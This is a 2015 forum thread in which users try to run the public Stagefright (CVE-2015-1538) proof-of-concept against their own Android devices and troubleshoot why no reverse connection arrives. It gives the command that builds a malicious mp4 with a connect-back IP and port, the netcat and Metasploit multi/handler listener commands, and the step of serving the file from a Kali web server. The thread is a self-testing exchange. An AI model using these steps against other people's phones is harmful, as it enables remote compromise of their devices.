0v3rl04d Posted October 11, 2015 Posted October 11, 2015 Hi guys, after the discovery of the Stagefright bug, the researcher of Zimperium have post a python script for the specific module CVE 1538. I've download it and i've try to execute this on my Android phone with Lollipop 5.0. Before this, i've downloaded the apk of zimperium to test if my phone is vulnerable. The app show me, in green, the module CVE-1538 e other... After this, on my linux pc with python 2.7.x, i've renamed the script in mp4.py for resolve an error of import. After this i've tried to generate the file.mp4 with this command: $python2 mp4.py -c [LAN IP] -p 4444 The script correctly generate an file.mp4 without an error. After i've launch a listener with: $netcat -l -p 4444 I've sended the file.mp4 to my smartphone and i've tried to exec this. The terminal with netcat don't show anything, no result, nisba, nada... I've tried with metasploit listener with multi/hanlder but with a same result. Any solution? Thanks everyone and sorry for my english ;-P Quote
cooper Posted October 12, 2015 Posted October 12, 2015 The app show me, in green, the module CVE-1538 e other... According to the screenshots provided for the Stagefright Detector app they released green means your phone is NOT susceptible. Given that, what is it you're trying to do? Quote
0v3rl04d Posted October 12, 2015 Author Posted October 12, 2015 Sorry, i'm not mean the red final bar, but the module result in the new version of the app are colored in green and red.This is an example on my phone: http://imgur.com/Lyex9y5 Quote
digip Posted October 15, 2015 Posted October 15, 2015 I would assume the same thing Cooper said, that if you are in green for "CVE-1538" specifically, you are only vulnerable to the attacks that fall under the other CVE's that are listed in red. Other thing to consider, that if you are vulnerable, maybe the listener doesn't see anything because it can't reach your machine from the phone, which may need port forwarding and such in place to see the reply from the phone. Test everything is working for the listener first, connect locally from another machine to your listener. If works locally, then try from the internet, such as setting up a fake web page and then connecting over yoru browser. ex: cat sometextfile.txt | nc -l -p 4444 (Or if on windows) type sometextfile.txt | nc -l -p 4444 And then in your browser, connect to your local IP using http://your.local.ip/and your internet based IP (Type "ip" by itself into google to get your external IP) you should see the output of your text file in your web browser. if that works locally and remote, then you should see whatever the phone is supposed to send back to you. Get the listener working first, then you can test if the code works against your phone. If it doens't send back a shell or whatever prompt it's supposed to show from the phone, then you probably aren't vulnerable. Quote
0v3rl04d Posted October 16, 2015 Author Posted October 16, 2015 Thank you, is very simple and good test for netcat. I did't know it! I've tested locally and remotely and both work well! So probably my phone isn't vulnerable... I'll try with another phone... Quote
ZaraByte Posted October 29, 2015 Posted October 29, 2015 Thank you, is very simple and good test for netcat. I did't know it! I've tested locally and remotely and both work well! So probably my phone isn't vulnerable... I'll try with another phone... People wanted me to do a video on this the public exploit released doesn't work for my Nexus 7 2013 tablet even though the detector claims my tablet is vulnerable renamed the python script to mp4.py that part works when making the mp4 set my chost and set my cback port made the mp4 called test.mp4 placed it on my kali apache server started a nc -l -p 4444 went to my kali webserver to run the mp4 nothing happens :B no connect back on netcat so :B Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.